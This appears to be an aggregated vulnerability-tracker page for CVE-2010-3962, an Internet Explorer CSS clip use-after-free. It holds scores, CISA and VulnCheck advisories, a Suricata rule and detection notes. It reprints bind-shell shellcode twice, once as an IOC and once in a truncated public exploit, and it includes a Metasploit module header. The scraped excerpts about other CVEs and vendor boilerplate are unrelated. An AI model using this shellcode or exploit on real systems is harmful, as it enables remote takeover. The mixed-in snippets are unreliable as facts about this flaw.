CVE-2010-3962
published 2010-11-05CVE-2010-3962: Use-after-free vulnerability in Microsoft Internet Explorer 6, 7, and 8 allows remote attackers to execute arbitrary code via vectors related to Cascading…
PriorityP186high8.1CVSS 3.1
AVNACHPRNUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2025-10-27
Exploited in the wild
EPSS
96.89%
99.9th percentile
Use-after-free vulnerability in Microsoft Internet Explorer 6, 7, and 8 allows remote attackers to execute arbitrary code via vectors related to Cascading Style Sheets (CSS) token sequences and the clip attribute, aka an "invalid flag reference" issue or "Uninitialized Memory Corruption Vulnerability," as exploited in the wild in November 2010.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
%u9090%u9090%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32%u6854%u774c%u0726%ud5ff
- →Exploit combines CVE-2010-0806 and CVE-2010-3962 in a single HTML/JS page; look for heap spray patterns using repeated '%u0d0d%u0d0d' NOP sleds alongside CSS clip attribute manipulation in the same document. ↗
- →Exploit delivery involves obfuscated JavaScript (.js) loaded from the same malicious domain as the HTML page; detect co-loading of obfuscated JS from newly-registered or low-reputation domains alongside CSS token sequences. ↗
- →The exploit targets mshtml.dll via a specially crafted CSS tag with the clip attribute; monitor for iexplore.exe crashes or abnormal child process spawning from iexplore.exe on IE 6/7/8. ↗
- →The vtable corruption causes EIP to land at [vtable+0x30+1]; the exact landing address is mshtml.dll version-dependent. Heap spray targets 0x0d0d0d0d; alert on large allocations of repeated 0x0d0d0d0d patterns in browser process memory. ↗
- →Shellcode opens a bind shell on TCP port 4444; monitor for iexplore.exe listening on or connecting to port 4444. ↗
- →Hosting multiple malicious domains on one IP is common; pivot on the IP of dxcdfghg.com to identify co-hosted malicious infrastructure. ↗
- ·The Metasploit module only has working return addresses for IE6 and IE7; IE8 targets are commented out as non-functional, meaning the module will not reliably exploit IE8 despite the CVE affecting it. ↗
- ·The exploit return address is not attacker-controlled and is entirely dependent on the loaded mshtml.dll version; some versions land EIP in non-exploitable regions (kernel space, another module), making exploitation version-sensitive. ↗
- ·DEP/ASLR bypass is not implemented in the public PoC exploit; ROP-based bypass is also noted as unlikely due to the non-controllable program counter value. ↗
- ·The public PoC exploit (exploit-db 15421) is described as 'quick and dirty' with no DEP/ASLR bypass; heap spray allocation sizes are hardcoded per mshtml.dll version and must be adjusted for other versions. ↗
CVSS provenance
nvdv3.18.1HIGHCVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
vulncheck8.1HIGH
cisa8.1HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-cmh7-cfjq-p92g: Use-after-free vulnerability in Microsoft Internet Explorer 6, 7, and 8 allows remote attackers to execute arbitrary code via vectors related to Casca
ghsa_unreviewed·2022-05-13
CVE-2010-3962 [HIGH] CWE-416 GHSA-cmh7-cfjq-p92g: Use-after-free vulnerability in Microsoft Internet Explorer 6, 7, and 8 allows remote attackers to execute arbitrary code via vectors related to Casca
Use-after-free vulnerability in Microsoft Internet Explorer 6, 7, and 8 allows remote attackers to execute arbitrary code via vectors related to Cascading Style Sheets (CSS) token sequences and the clip attribute, aka an "invalid flag reference" issue or "Uninitialized Memory Corruption Vulnerability," as exploited in the wild in November 2010.
VulnCheck
Microsoft Internet Explorer Uninitialized Memory Corruption Vulnerability
vulncheck·2010·CVSS 8.1
CVE-2010-3962 [HIGH] Microsoft Internet Explorer Uninitialized Memory Corruption Vulnerability
Microsoft Internet Explorer Uninitialized Memory Corruption Vulnerability
Microsoft Internet Explorer contains an uninitialized memory corruption vulnerability that could allow for remote code execution. The impacted product could be end-of-life (EoL) and/or end-of-service (EoS). Users should discontinue product utilization.
Affected: Microsoft Internet Explorer
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://www.cve.org/CVERecord?id=CVE-2010-3962; https://web.archive.org/web/20160910124439/http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong; https://symantec-enterprise-blogs.secur
CISA
Microsoft Internet Explorer Uninitialized Memory Corruption Vulnerability
cisa·2025-10-06·CVSS 8.1
CVE-2010-3962 [HIGH] Microsoft Internet Explorer Uninitialized Memory Corruption Vulnerability
Vulnerability: Microsoft Internet Explorer Uninitialized Memory Corruption Vulnerability
Affected: Microsoft Internet Explorer
Microsoft Internet Explorer contains an uninitialized memory corruption vulnerability that could allow for remote code execution. The impacted product could be end-of-life (EoL) and/or end-of-service (EoS). Users should discontinue product utilization.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: https://learn.microsoft.com/en-us/security-updates/SecurityAdvisories/2010/2458511?redirectedfrom=MSDN ; https://nvd.nist.gov/vuln/detail/CVE-2010-3962
Remediation Due Date: 2025-10-27
Suricata
ET WEB_CLIENT Microsoft IE CSS Clip Attribute Memory Corruption (POC SPECIFIC)
suricata·2010-11-05
CVE-2010-3962 ET WEB_CLIENT Microsoft IE CSS Clip Attribute Memory Corruption (POC SPECIFIC)
ET WEB_CLIENT Microsoft IE CSS Clip Attribute Memory Corruption (POC SPECIFIC)
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_CLIENT Microsoft IE CSS Clip Attribute Memory Corruption (POC SPECIFIC)"; flow:established,to_client; file.data; content:"position|3A|absolute|3B|"; content:"clip|3A|"; within:20; content:"rect|28|0|29|"; fast_pattern; within:20; reference:url,extraexploit.blogspot.com/2010/11/cve-2010-3962-yet-another-internet.html; reference:url,www.symantec.com/connect/blogs/new-ie-0-day-used-targeted-attacks; reference:url,blog.fireeye.com/research/2010/11/ie-0-day-hupigon-joins-the-party.html; reference:url,www.offensive-security.com/0day/ie-0day.txt; reference:url,www.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/browser
Exploit-DB
Microsoft Internet Explorer - CSS SetUserClip Memory Corruption (MS10-090) (Metasploit)
exploitdb·2011-01-20
CVE-2010-3962 Microsoft Internet Explorer - CSS SetUserClip Memory Corruption (MS10-090) (Metasploit)
Microsoft Internet Explorer - CSS SetUserClip Memory Corruption (MS10-090) (Metasploit)
---
##
# $Id: ms10_090_ie_css_clip.rb 11610 2011-01-20 19:30:59Z egypt $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 HttpClients::IE,
:ua_minver => "6.0",
:ua_maxver => "7.0",
:javascript => true,
:os_name => OperatingSystems::WINDOWS,
:vuln_test => nil, # no way to test without just trying it
})
def initialize(info = {})
super(update_info(info,
'Name' => 'Internet Explorer CSS SetUserClip Memory Corruption',
'Description' => %q{
Thie module exploits
Exploit-DB
Microsoft Internet Explorer 6/7/8 - Memory Corruption
exploitdb·2010-11-04·CVSS 8.1
CVE-2010-3962 [HIGH] Microsoft Internet Explorer 6/7/8 - Memory Corruption
Microsoft Internet Explorer 6/7/8 - Memory Corruption
---
# Internet Explorer Memory Corruption 0day Vulnerability CVE-2010-3962
# Tested on Windows XP SP3 IE6 IE7 IE8
# Coded by Matteo Memelli ryujin __at__ offsec.com
# http://www.offensive-security.com/0day/ie-0day.txt
# Thx to dookie __at__ offsec.com
# notes : This is a quick and dirty exploit! No DEP/ASLR bypass here feel free to improve it
poc CVE-2010-3962 zeroday
function alloc(bytes, mystr) {
// Bindshell on port 4444
var shellcode = unescape('%u9090%u9090%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b'+
'%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b'+
'%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34'+
'%ud601%uff31%uc031%uc1a
Exploit-DB
Microsoft Internet Explorer - Memory Corruption
exploitdb·2010-11-04
CVE-2010-3962 Microsoft Internet Explorer - Memory Corruption
Microsoft Internet Explorer - Memory Corruption
---
Metasploit
MS10-090 Microsoft Internet Explorer CSS SetUserClip Memory Corruption
metasploit
MS10-090 Microsoft Internet Explorer CSS SetUserClip Memory Corruption
MS10-090 Microsoft Internet Explorer CSS SetUserClip Memory Corruption
This module exploits a memory corruption vulnerability within Microsoft's HTML engine (mshtml). When parsing an HTML page containing a specially crafted CSS tag, memory corruption occurs that can lead arbitrary code execution. It seems like Microsoft code inadvertently increments a vtable pointer to point to an unaligned address within the vtable's function pointers. This leads to the program counter being set to the address determined by the address "[vtable+0x30+1]". The particular address depends on the exact version of the mshtml library in use. Since the address depends on the version of mshtml, some versions may not be exploitable. Specifically, those ending up with a program counter value within another module,
Zscaler
Memory Corruption Vulnerabilities Target IE 6 & 7 | Blog
blogs_zscaler·2011-07-14·CVSS 9.3
[CRITICAL] Memory Corruption Vulnerabilities Target IE 6 & 7 | Blog
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Recorded Future
Tracking the Clandestine Fox
blogs_recorded_future·CVSS 8.1
CVE-2014-1776 [HIGH] Tracking the Clandestine Fox
## Tracking the Clandestine Fox
## Analysis Summary
FireEye Research Labs reports targeted attacks using a new IE zero-day against defense and financial services.
Early details on malware in the wild and threat actor behind it are slight.
FireEye links to Pirpi provide an interesting clue, while Websense analysis of IE crashes points in a different direction.
## The Vulnerability: Internet Explorer CVE-2014-1776
Last Saturday, FireEye Research Labs flagged an Internet Explorer (IE) zero-day being actively exploited in targeted attacks . This Microsoft Internet Explorer vulnerability, CVE-2014-1776 , broadly impacts IE versions from 6 through 11, and is trending strongly in open source.
CVE-2014-1776 is the highest profile vulnerability yet to hit Windows XP, which recently passed ou
Zscaler
Zscaler found Multiple Security Vulnerabilities | 12-14-2010
blogs_zscaler·CVSS 9.3
[CRITICAL] Zscaler found Multiple Security Vulnerabilities | 12-14-2010
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Zscaler
Zscaler Provides Protection for Critical IE Vulnerabilities
blogs_zscaler
Zscaler Provides Protection for Critical IE Vulnerabilities
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Recorded Future
Tracking the Clandestine Fox
blogs_recorded_future·CVSS 8.1
CVE-2014-1776 [HIGH] Tracking the Clandestine Fox
# Tracking the Clandestine Fox
### Analysis Summary
- FireEye Research Labs reports targeted attacks using a new IE zero-day against defense and financial services.
- Early details on malware in the wild and threat actor behind it are slight.
- FireEye links to Pirpi provide an interesting clue, while Websense analysis of IE crashes points in a different direction.
### The Vulnerability: Internet Explorer CVE-2014-1776
Last Saturday, FireEye Research Labs flagged an Internet Explorer (IE) zero-day being actively exploited in targeted attacks. This Microsoft Internet Explorer vulnerability, CVE-2014-1776, broadly impacts IE versions from 6 through 11, and is trending strongly in open source.
CVE-2014-1776 is the highest profile vulnerability yet to hit Windows XP, which recently passed
Recorded Future
October 2025 CVE Landscape
blogs_recorded_future·CVSS 9.8
[CRITICAL] October 2025 CVE Landscape
# October 2025 CVE Landscape: 32 High-Impact Vulnerabilities Demand Immediate Attention
October 2025 saw a significant escalation in vulnerability activity, with Recorded Future's Insikt Group® identifying 32 high-impact vulnerabilities, double the 16 identified in September's CVE report. Twenty-six of these vulnerabilities scored as Very Critical.
What security teams need to know:
- Microsoft dominates: Eight of 32 vulnerabilities affect Microsoft products, including a critical WSUS deserialization flaw (CVE-2025-59287) now being actively exploited
- CL0P ransomware group exploited an Oracle E-Business Suite zero-day (CVE-2025-61882) for data theft and extortion campaigns
- Legacy vulnerabilities persist: Five of the 14 RCE-enabling vulnerabilities are over a decade old, highlighting c
arXiv
Investigation of Advanced Persistent Threats Network-based Tactics, Techniques and Procedures
arxiv_fulltext·2025-02-12
Investigation of Advanced Persistent Threats Network-based Tactics, Techniques and Procedures
Investigation of Advanced Persistent Threats Network-based Tactics, Techniques and Procedures
Almuthanna Alageel
and
Sergio Maffeis
Department of Computing
Imperial College London
London, United Kingdom
plain
plain
## Abstract
The scarcity of data and the high complexity of Advanced Persistent Threats (APTs) attacks have created challenges in comprehending their behavior and hindered the exploration of effective detection techniques.
To create an effective APT detection strategy, it is important to examine the Tactics, Techniques, and Procedures (TTPs) that have been reported by the industry. These TTPs can be difficult to classify as either malicious or legitimate. When developing an approach for the next generation of network intrusion detection systems (NIDS), it is necessary to
Bugzilla
CVE-2008-7258 Ssmtp: Buffer overflow by cutting '\n' sequence from lines with leading dot
bugzilla·2010-07-26·CVSS 2.6
CVE-2008-7258 [LOW] CVE-2008-7258 Ssmtp: Buffer overflow by cutting '\n' sequence from lines with leading dot
CVE-2008-7258 Ssmtp: Buffer overflow by cutting '\n' sequence from lines with leading dot
Brendan Boerner reported:
[1] https://bugs.launchpad.net/ubuntu/+source/ssmtp/+bug/282424
a deficiency in the way ssmtp removed trailing '\n' sequence
by processing lines beginning with a leading dot. A local user,
could send a specially-crafted e-mail message via ssmtp send-only
sendmail emulator, leading to ssmtp executable denial of service (exit with:
ssmtp: standardise() -- Buffer overflow). Different vulnerability
than CVE-2008-3962.
References:
[2] https://bugzilla.redhat.com/show_bug.cgi?id=582236
[3] https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2008-3962
[4] http://patch-tracker.debian.org/package/ssmtp/2.62-3
[5] http://lists.fedoraproject.org/pipermail/package-announce/2010-May/041012
http://blogs.technet.com/b/msrc/archive/2010/11/02/microsoft-releases-security-advisory-2458511.aspxhttp://secunia.com/advisories/42091http://www.exploit-db.com/exploits/15418http://www.exploit-db.com/exploits/15421http://www.kb.cert.org/vuls/id/899748http://www.microsoft.com/technet/security/advisory/2458511.mspxhttp://www.securityfocus.com/bid/44536http://www.securitytracker.com/id?1024676http://www.symantec.com/connect/blogs/new-ie-0-day-used-targeted-attackshttp://www.us-cert.gov/cas/techalerts/TA10-348A.htmlhttp://www.vupen.com/english/advisories/2010/2880https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-090https://exchange.xforce.ibmcloud.com/vulnerabilities/62962https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12279http://blogs.technet.com/b/msrc/archive/2010/11/02/microsoft-releases-security-advisory-2458511.aspxhttp://secunia.com/advisories/42091http://www.exploit-db.com/exploits/15418http://www.exploit-db.com/exploits/15421http://www.kb.cert.org/vuls/id/899748http://www.microsoft.com/technet/security/advisory/2458511.mspxhttp://www.securityfocus.com/bid/44536http://www.securitytracker.com/id?1024676http://www.symantec.com/connect/blogs/new-ie-0-day-used-targeted-attackshttp://www.us-cert.gov/cas/techalerts/TA10-348A.htmlhttp://www.vupen.com/english/advisories/2010/2880https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-090https://exchange.xforce.ibmcloud.com/vulnerabilities/62962https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A12279https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2010-3962
2010-11-05
Published
2025-10-06
Added to CISA KEV
Exploited in the wild